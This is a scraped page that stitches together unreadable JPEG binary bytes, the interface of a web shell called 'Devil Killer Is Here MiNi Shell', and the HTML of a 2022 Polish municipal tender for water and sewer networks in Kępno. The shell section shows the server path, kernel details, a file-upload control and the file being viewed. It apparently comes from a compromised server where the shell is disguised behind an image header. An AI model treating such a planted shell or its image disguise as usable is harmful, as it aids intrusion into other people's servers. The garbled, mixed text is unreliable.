JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220207/0004858801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa sieci wodociągowej, sieci kanalizacji sanitarnej i deszczowej związanej z uzbrojeniem terenu osiedla mieszkaniowego przy ul. Piłsudskiego w Kępnie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kępno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250854731</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ratuszowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kępno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">625909400</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">625909402</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kepno@um.kepno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kepno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa sieci wodociągowej, sieci kanalizacji sanitarnej i deszczowej związanej z uzbrojeniem terenu osiedla mieszkaniowego przy ul. Piłsudskiego w Kępnie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-56c62978-87f4-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00048588</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00029894/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Budowa sieci wodociągowej, sieci kanalizacji sanitarnej i deszczowej związanej z uzbrojeniem terenu osiedla mieszkaniowego przy ul. Piłsudskiego w Kępnie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">13.1.Komunikacja odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem<br/>Platformy on-line działającej pod adresem https://e-propublico.pl.<br/>13.2.Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>13.3.Na Platformie postępowanie prowadzone jest pod nazwą: Rewitalizacja Parku Miejskiego<br/>13.4.Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje<br/>warunki korzystania z Platformy określone w Regulaminie na stronie internetowej https://e-propublico.pl<br/>oraz uznaje go za wiążący.13.5.Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać<br/>konto na Platformie.<br/>13.6.Do złożenia oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania<br/>Wykonawcy ważnego kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu<br/>osobistego.13.7.Ilekroć w niniejszej SWZ jest mowa o:<br/>a)podpisie zaufanym–należy przez to rozumieć podpis, o którym mowa art. 3 pkt 14a ustawy z 17<br/>lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j Dz.U.2020<br/>poz. 346);b)podpisie osobistym – należy przez to rozumieć podpis, o którym mowa w art. z art. 2 ust. 1<br/>pkt 9 ustawy z 6 sierpnia 2010 r. o dowodach osobistych (t.j Dz.U.2020 poz. 332).<br/>13.8.Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:a)dokumenty<br/>sporządzone i przesyłane w formacie .pdf zaleca się podpisywać kwalifikowanym podpisem<br/>elektronicznym w formacie PAdES;b)dokumenty sporządzone i przesyłane w formacie innym niż .pdf<br/>(np.: .doc, .docx, .xlsx, .xml) zaleca się podpisywać kwalifikowanym podpisem elektronicznym w<br/>formacie XAdES;c) do składania kwalifikowanego podpisu elektronicznego zaleca się stosowanie<br/>algorytmu SHA-2 (lub wyższego).13.9.Zamawiający określa następujące wymagania sprzętowo –<br/>aplikacyjne pozwalające na korzystanie z Platformy:<br/>a)stały dostęp do sieci Internet;b)posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (email),c)komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo<br/>Linux,d)zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi,<br/>stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, MicrosoftEdge, Mozilla Firefox, Google Chrome, Opera),e)włączona obsługa JavaScript oraz Cookies.13.10.<br/>Zamawiający dopuszcza następujący format przesyłanych danych: pliki w formatach określonych<br/>odpowiednimi przepisami prawa, tj. m.in.: .doc, .docx, .txt, .xls, .xlsx, .ppt, .csv, .pdf, .jpg, .git, .png, .tif,<br/>.dwg, .ath, .kst, .zip, .rar, przy czym zaleca się wykorzystywanie plików w formacie .pdf, .doc, .docx.,<br/>.xlsx, .xml. Maksymalny rozmiar pojedynczego pliku to 80 MB, przy czym nie określa się limitu liczby<br/>plików.13.11.Zamawiający określa następujące informacje na temat kodowania i czasu odbioru<br/>danych:a) załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z<br/>załącznikami, nie jest dostępny dla Zamawiającego i przechowywany jest na serwerach Platformy w<br/>formie zaszyfrowanej. Zamawiający otrzyma dostęp do pliku dopiero po upływie terminu otwarcia<br/>ofert;b)oznaczenie czasu odbioru danych przez Platformę stanowi przyporządkowaną do dokumentu<br/>elektronicznego datę oraz dokładny czas (hh:mm:ss), widoczne przy wysłanym dokumencie w<br/>kolumnie ”Data przesłania”;<br/>c)o terminie przesłania decyduje czas pełnego przeprocesowania transakcji pliku na<br/>Platformie.13.12.W postępowaniu, wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje<br/>przekazywane są za pośrednictwem Platformy (karta ”Wiadomości”). Za datę wpływu oświadczeń,<br/>wniosków, zawiadomień oraz informacji przesłanych za pośrednictwem Platformy, przyjmuje się datę<br/>ich zamieszczenia na Platformie.<br/>13.13. Ofertę, wraz ze stanowiącymi jej integralną część załącznikami, składa się pod rygorem<br/>nieważności w formie elektronicznej lub postaci elektronicznej za pośrednictwem Platformy, podpisaną<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">28.1. Zamawiający oświadcza, że spełnia wymogi określone<br/>w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez<br/>Wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>28.2. Zamawiający informuje, że:<br/>1) administratorem danych osobowych Wykonawcy jest Burmistrz Miasta i Gminy Kępno, Ratuszowa 1<br/>, 63-600 Kępno.<br/>Tel.: 62 5909400, e-mail: kepno@um.kepno.pl<br/>2) w sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z<br/>Inspektorem Ochrony Danych, którym jest Zofia Siubiak, za pośrednictwem telefonu 625909417 lub<br/>adresu e-mail: zofia.siubiak@um.kepno.pl;<br/>3) dane osobowe Wykonawcy będą przetwarzane w celu przeprowadzenia postępowania o udzielenie<br/>zamówienia publicznego pn. &#34;Rewitalizacja Parku Miejskiego&#34; w ramach realizacji projektu pn.<br/>Rewitalizacja zdegradowanego fizycznie, społecznie i gospodarczo obszaru rynku i okolic w Kępnie<br/>poprzez realizację wybranych celów inwestycyjnych wskazanych w Lokalnym Programie Rewitalizacji.<br/>Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach<br/>Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2014-2020. – znak sprawy:<br/>WR.271.1.2022 oraz w celu archiwizacji dokumentacji dotyczącej tego postępowania;<br/>4) odbiorcami przekazanych przez Wykonawcę danych osobowych będą osoby lub podmioty, którym<br/>zostanie udostępniona dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp;<br/>5) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy w<br/>sprawie zamówienia publicznego przekracza 4 lata, okres przechowywania obejmuje cały okres<br/>obowiązywania umowy.<br/>28.3. Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, dowypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z<br/>udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>1) obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane<br/>osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał i przekazał Zamawiającemu<br/>w treści oferty lub dokumentów składanych na żądanie Zamawiającego;<br/>2) obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane<br/>Wykonawca pozyskał w sposób pośredni, a które to dane Wykonawca przekazuje Zamawiającemu w<br/>treści oferty lub dokumentów składanych na żądanie Zamawiającego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">28.4. Zamawiający informuje, że;<br/>1) udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków<br/>skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o<br/>których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie;<br/>2) udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych<br/>osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych<br/>ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub<br/>światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych,<br/>danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych<br/>dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku<br/>postępowania o udzielenie zamówienia;<br/>3) w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego,<br/>z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem Wykonawcy do<br/>uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące,<br/>prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w<br/>art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub<br/>organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od administratora kopii<br/>danych osobowych podlegających przetwarzaniu), Zamawiający może żądać od osoby występującej z<br/>żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia;<br/>4) skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o którym mowa w<br/>art. 16 RODO (uprawnienie do sprostowania lub uzupełnienia danych osobowych), nie może naruszać<br/>integralności protokołu postępowania oraz jego załączników;<br/>5) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania;<br/>6) w przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust.<br/>2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Wr.271.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 8645590,86 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja zadania pod nazwą: Budowa sieci wodociągowej, sieci kanalizacji sanitarnej i deszczowej związanej z uzbrojeniem terenu osiedla mieszkaniowego przy ul. Piłsudskiego w Kępnie zakres zadania: sieć wodociągowa Dz 200 - 110 o dł. ok. 1660 mb, kanalizacja sanitarna Dn 800-200 dł. ok.1546 mb; kanalizacja deszczowa o dł. ok 590 mb.ETAP 01 podetap 2: odcinek od W27.3. do W33 Budowa sieci wodociągowej w ul. Piłsudskiego w Kępnie<br/>- sieci wodociągowe z rur PE100RC SDR17 Dz110 wraz z armaturą, o łącznej długości ok. 6,00m,- sieci wodociągowe z rur PE100RC SDR17 Dz160 wraz z armaturą, o łącznej długości ok. 140m,-hydranty p.poż DN80 nadziemne – 1 kpl- przełączenie istniejących sieci do sieci nowoprojektowanych,- montaż armatury sieciowej,- trwałe wyłączenie z eksploatacji sieci wodociągowych przewidzianych do likwidacji (demontaż odcinków kolidujących z projektowanymi rozwiązaniami) UWAGA: Podetap 01: odcinek W1-HP80_N_1-27 do W27.3 – HP80_N_4 został wykonany i nie jest objęty niniejszym zamówieniem. Dokumentacja projektowa dotycząca ETAPU 01 obejmuje szerszy zakres niż przedmiot zamówienia, w związku z tym do wyceny należy przyjąć ilości wskazane w załączonym przedmiarze robót, z uwzględnieniem powyższych długości sieci.ETAP 02: Budowa sieci wodociągowej w ul. Piłsudskiego w Kępnie (odcinek od W33 do W38-HP80_N_6):<br/>- sieci wodociągowe z rur PE100RC SDR17 Dz 110 wraz z armaturą, o łącznej długości ok. 14,00 m,- sieci wodociągowe z rur PE100RC SDR17 Dz160 wraz z armaturą, o łącznej długości ok. 118,00 m- hydranty p.poż. DN80 nadziemne – 1 kpl.- przełączenie istniejących sieci do sieci nowoprojektowanych,- montaż armatury sieciowej,- trwałe wyłączenie z eksploatacji sieci wodociągowych przewidzianych do likwidacji (demontaż odcinków kolidujących z projektowanymi rozwiązaniami)ETAP I: Rozbudowa sieci wodociągowej ul. Dąbrowskiego – ul. Sienkiewicza – ul. Pileckiego w Kępnie (odcinek W1-W25a):- sieci wodociągowe z rur PE100RC SDR17 Dz90 wraz z armaturą, o łącznej długości ok. 2,00 m,- sieci wodociągowe z rur PE100RC SDR17 Dz110 wraz z armaturą, o łącznej długości ok.4,00 m,- sieci wodociągowe z rur PE100RC SDR17 Dz160 wraz z armaturą, o łącznej długości ok. 2,00 m,<br/>- sieci wodociągowe z rur PE100RC SDR17 Dz200 wraz z armaturą, o łącznej długości ok. 540,00 m,- hydranty p.poż DN80 nadziemne – 1 kpl.- studnia DN1200 wraz z zespołem odpowietrzająco – napowietrzającym – 2 kpl.- przełączenie istniejących sieci do sieci nowoprojektowanych,- montaż armatury sieciowej,- trwałe wyłączenie z eksploatacji sieci wodociągowych przewidzianych do likwidacji (demontaż odcinków kolidujących z projektowanymi rozwiązaniami) - odtworzenie nawierzchni w ul. Dąbrowskiego ETAP II: Rozbudowa sieci wodociągowej na odcinku od węzła W25a do węzła W30a, w ul Obrońców Pokoju w Kępnie:<br/>- sieci wodociągowe z rur PE100 SDR17 RC Dz200 wraz z armaturą, o łącznej długości ok. 143,00 m- montaż armatury sieciowej- prace należy wykonać metodami bezwykopowymi (siec wodociągowa w pasie drogowym wykonanie metodą bezwykopową + komory robocze)Odcinki sieci wodociągowej przewidziane do realizacji metodami bezwykopowymi: W10-W15-W18-W26-W30-W32-W37; W37-W52 (w przypadku równoczesnej realizacji sieci kanalizacyjnej dopuszcza się wykonanie metodą przekopu otwartego); W43.2-W43.9-W48 (w przypadku równoczesnej realizacji sieci kanalizacyjnej dopuszcza się wykonanie metodą przekopu otwartego). Pozostałe odcinki oraz komory robocze wraz z wykopami punktowymi pod przekopy kontrolne wykonać metodą przekopu otwartego.<br/>ETAP III: Budowa sieci wodociągowej oraz sieci kanalizacji sanitarnej –odcinek W30a-W52 w ul. Piłsudskiego i ul. Bractwa Kurkowego w Kępnie:- sieci kanalizacyjne (sanitarne) z rur i kształtek PVC-U SN12 Dn200 o łącznej długości ok. 348,00 m w osi studni,- sieci kanalizacyjne (sanitarne) z rur i kształtek PVC-U SN12 Dn500 o łącznej długości ok. 314,00 m w osi studni,<br/>- studnie kanalizacyjne (sanitarne) DN1000 wraz z włazem kl. D400 – 2 kpl.- studnie kanalizacyjne (sanitarne) DN1200 wraz z włazem kl. D400 – 17 kpl.- studnie kanalizacyjne (sanitarne) DN630 wraz z włazem kl. D400 – 1 kpl.- studnie kanalizacyjne (sanitarne) DN500 wraz z włazem kl. D400 – 1 kpl.- sieci wodociągowe z rur PE100RC SDR17 Dz90 wraz z armaturą, o łącznej długości ok. 27,00 m,- sieci wodociągowe z rur PE 100RC SDR17 Dz110 wraz z armaturą, o łącznej długości ok. 335,00 m,<br/>- sieci wodociągowe z rur PE 100RC SDR17 Dz200 wraz z armaturą, o łącznej długości ok. 335,00 m,- hydranty p.poż DN80 podziemne – 2 kpl.- hydranty p.poż. DN80 nadziemne – 3 kpl.<br/>- przełączenie istniejących sieci i przyłączy kanalizacyjnych do sieci nowo budowanych,- montaż armatury sieciowej- trwałe wyłączenie z eksploatacji sieci wodociągowych i kanalizacyjnych przewidzianych do likwidacji (demontaż odcinków kolidujących z budowanymi rozwiązaniami)-odtworzenie nawierzchni <br/>ETAP IV (01): Budowa sieci kanalizacji sanitarnej wraz z przyłączami – odcinek (od Sk1 do Sk14) ul. Piłsudskiego w Kępnie:<br/>- sieci kanalizacyjne (sanitarne) z rur PVC-U SN12 Dn160 wraz ze studniami, o łącznej długości ok. 3,00m w osi studni,- sieci kanalizacyjne (sanitarne) z rur PVC-U SN12 Dn200 wraz ze studniami, o łącznej długości ok. 76,00 m w osi studni,- sieci kanalizacyjne (sanitarne) z rur PVC-U SN12 Dn500 wraz ze studniami, o łącznej długości ok. 37,00 m w osi studni,- sieci kanalizacyjne (sanitarne) z rur PVC-U SN12 Dn800 wraz ze studniami, o łącznej długości ok. 400,00 m w osi studni,<br/>- studnie kanalizacyjne DN1200 wraz z włazem kl.D400 – 3kpl.<br/>- studnie kanalizacyjne DN1500 wraz z włazem kl. D400 – 14 kpl. <br/>- przełączenie istniejących sieci i przyłączy kanalizacyjnych do sieci nowo budowanych- trwałe wyłączenie z eksploatacji sieci kanalizacyjnych przewidzianych do likwidacji (demontaż odcinków kolidujących z projektowanymi rozwiązaniami).ETAP V (02): Budowa sieci kanalizacji sanitarnej wraz z przyłączami – odcinek od Sk14 do Sk19) ul. Piłsudskiego w Kępnie- sieci kanalizacyjne (sanitarne) z rur PVC-U SN12 Dn200 wraz ze studniami, o łącznej długości ok. 68,00 m w osi studni- sieci kanalizacyjne (sanitarne) z rur PVC-U SN12 Dn250 wraz ze studniami, o łącznej długości ok. 90,00m w osi studni- sieci kanalizacyjne (sanitarne) z rur PVC-U SN12 Dn800 wraz ze studniami, o łącznej długości ok. 225,00 m w osi studni- studnie kanalizacyjne DN1200 wraz z włazem kl. D400 – 4 kpl.- studnie kanalizacyjne DN1500 wraz z włazem kl. D400 – 4kpl.- studnie kanalizacyjne DN2000 wraz z włazem kl. D400 – 1 kpl.- przełączenie istniejących sieci i przyłączy kanalizacyjnych do sieci nowo budowanych- trwałe wyłączenie z eksploatacji sieci kanalizacyjnych przewidzianych do likwidacji (demontaż odcinków kolidujących z projektowanymi rozwiązaniami) ETAP VI: Kanalizacja deszczowa ul. Piłsudskiego w Kępnie 